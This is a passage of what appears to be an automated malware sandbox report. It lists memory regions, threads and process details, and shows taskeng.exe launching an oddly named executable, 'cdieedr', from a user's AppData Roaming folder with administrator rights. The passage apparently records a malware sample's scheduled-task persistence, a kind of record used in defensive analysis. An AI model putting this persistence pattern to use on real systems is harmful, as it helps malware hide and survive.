"private_0x000007fffff78000" filename = "" Region: id = 1448 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1449 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1450 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1451 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1452 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1453 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1454 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1455 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1456 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1457 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1458 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1459 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1460 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1461 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1462 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1463 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1464 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1465 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1466 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1467 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1468 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1469 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1470 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1471 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1472 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1473 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1474 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1475 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1476 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1477 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 42 os_tid = 0xdf4 Thread: id = 43 os_tid = 0xdf0 Thread: id = 44 os_tid = 0xd78 Thread: id = 45 os_tid = 0xd38 Thread: id = 46 os_tid = 0xc70 Thread: id = 47 os_tid = 0x8c4 Thread: id = 48 os_tid = 0x790 Thread: id = 49 os_tid = 0x6d0 Thread: id = 50 os_tid = 0x7b0 Thread: id = 51 os_tid = 0x21c Thread: id = 52 os_tid = 0x4fc Thread: id = 53 os_tid = 0x354 Thread: id = 54 os_tid = 0x3c4 Thread: id = 55 os_tid = 0x34c Thread: id = 56 os_tid = 0x584 Thread: id = 57 os_tid = 0x27c Thread: id = 58 os_tid = 0x228 Thread: id = 59 os_tid = 0x110 Thread: id = 60 os_tid = 0x204 Thread: id = 61 os_tid = 0x238 Thread: id = 62 os_tid = 0x478 Thread: id = 63 os_tid = 0x444 Thread: id = 64 os_tid = 0x440 Thread: id = 65 os_tid = 0x76c Thread: id = 66 os_tid = 0x748 Thread: id = 67 os_tid = 0x730 Thread: id = 68 os_tid = 0x724 Thread: id = 69 os_tid = 0x718 Thread: id = 70 os_tid = 0x6fc Thread: id = 71 os_tid = 0x6e8 Thread: id = 72 os_tid = 0x6e0 Thread: id = 73 os_tid = 0x6c0 Thread: id = 74 os_tid = 0x6ac Thread: id = 75 os_tid = 0x694 Thread: id = 76 os_tid = 0x4b0 Thread: id = 77 os_tid = 0x4ac Thread: id = 78 os_tid = 0x49c Thread: id = 79 os_tid = 0x498 Thread: id = 80 os_tid = 0x48c Thread: id = 81 os_tid = 0x1bc Thread: id = 82 os_tid = 0x120 Thread: id = 83 os_tid = 0x3f0 Thread: id = 84 os_tid = 0x3e4 Thread: id = 85 os_tid = 0x3d8 Thread: id = 86 os_tid = 0x37c Thread: id = 87 os_tid = 0x378 Thread: id = 88 os_tid = 0x36c Thread: id = 89 os_tid = 0x364 Thread: id = 108 os_tid = 0xef8 Thread: id = 109 os_tid = 0xf00 Thread: id = 153 os_tid = 0xf30 Thread: id = 154 os_tid = 0xf34 Thread: id = 155 os_tid = 0xf38 Thread: id = 156 os_tid = 0xf3c Thread: id = 157 os_tid = 0xf40 Thread: id = 158 os_tid = 0xf44 Thread: id = 160 os_tid = 0xf4c Thread: id = 161 os_tid = 0xf50 Thread: id = 162 os_tid = 0xf54 Thread: id = 183 os_tid = 0x324 Thread: id = 186 os_tid = 0x888 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x30aca000" os_pid = "0xe80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x360" cmd_line = "taskeng.exe {21CC3504-7902-4F08-834E-4F911DEFB1CC} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1629 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1630 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1631 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1632 start_va = 0x150000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1633 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1634 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1635 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1636 start_va = 0xffa00000 end_va = 0xffa73fff monitored = 0 entry_point = 0xffa0f44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1637 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1638 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1639 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1640 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1641 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1642 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1643 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1644 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1645 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1646 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1647 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1648 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1649 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1650 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1651 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1652 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1653 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1654 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1655 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1656 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1657 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1658 start_va = 0x430000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1659 start_va = 0x1d0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1661 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1662 start_va = 0x430000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1663 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1664 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1665 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1666 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1667 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1668 start_va = 0x7a0000 end_va = 0x1b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1669 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 1671 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1672 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1673 start_va = 0x1ba0000 end_va = 0x1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1674 start_va = 0x1c70000 end_va = 0x1cecfff monitored = 0 entry_point = 0x1c7cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1676 start_va = 0x1c70000 end_va = 0x1cecfff monitored = 0 entry_point = 0x1c7cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1677 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1678 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1681 start_va = 0x1d90000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1682 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1683 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1684 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1685 start_va = 0xe0000 end_va = 0x124fff monitored = 0 entry_point = 0xe1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1686 start_va = 0xe0000 end_va = 0x124fff monitored = 0 entry_point = 0xe1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1687 start_va = 0xe0000 end_va = 0x124fff monitored = 0 entry_point = 0xe1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1688 start_va = 0xe0000 end_va = 0x124fff monitored = 0 entry_point = 0xe1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1689 start_va = 0xe0000 end_va = 0x124fff monitored = 0 entry_point = 0xe1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1690 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1692 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1693 start_va = 0x1f40000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 1694 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1697 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1698 start_va = 0x1c70000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 1699 start_va = 0x2020000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1700 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1701 start_va = 0x20a0000 end_va = 0x236efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1702 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1704 start_va = 0x1e90000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1705 start_va = 0x2410000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1706 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1707 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1708 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1709 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1710 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1712 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1713 start_va = 0x2490000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1714 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1715 start_va = 0x2490000 end_va = 0x256efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 1716 start_va = 0x25c0000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 1717 start_va = 0x2700000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1718 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1719 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Thread: id = 90 os_tid = 0xe84 Thread: id = 91 os_tid = 0xe88 Thread: id = 92 os_tid = 0xe8c Thread: id = 93 os_tid = 0xe90 Thread: id = 94 os_tid = 0xe94 Thread: id = 95 os_tid = 0xe98 Thread: id = 96 os_tid = 0xe9c Process: id = "6" image_name = "cdieedr" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr" page_root = "0x314f4000" os_pid = "0xea0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe80" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1801 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1802 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1803 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1804 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1805 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1806 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1807 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x423db0 region_type = mapped_file name = "cdieedr" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr") Region: id = 1808 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1809 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1810 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1811 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1812 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1813 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1814 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1815 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1816 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1817 start_va = 0x340000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1818 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1819 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 